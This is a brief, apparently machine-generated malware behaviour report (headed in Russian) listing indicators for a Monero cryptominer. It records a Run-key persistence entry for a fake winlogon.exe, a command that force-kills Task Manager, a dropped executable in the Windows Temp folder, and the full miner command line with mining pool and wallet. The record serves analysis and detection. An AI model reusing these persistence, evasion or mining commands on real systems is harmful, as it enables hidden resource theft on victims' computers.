Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'xxsdcyiyi' = 'C:\xxs\winlogon.exe'
- '<SYSTEM32>\taskkill.exe' /f /im Taskmgr.exe
- C:\xxs\winlogon.exe
- %WINDIR%\Temp\severxxs.exe
- 'po##.#upportxmr.com':7777
- DNS ASK po##.#upportxmr.com
- ClassName: '' WindowName: ''
- 'C:\xxs\winlogon.exe'
- '%WINDIR%\Temp\severxxs.exe' -B -o stratum+tcp://pool.supportxmr.com:7777 -u 455sUNJVbdNeXPxUq9Ha7zaauEUcdfMdHcTdfG4C6QrdKZxA4GiavMLGX13aaN6zYhJEtxHcNyMwwAUkfdSpw1eNTG75MXv -p s -k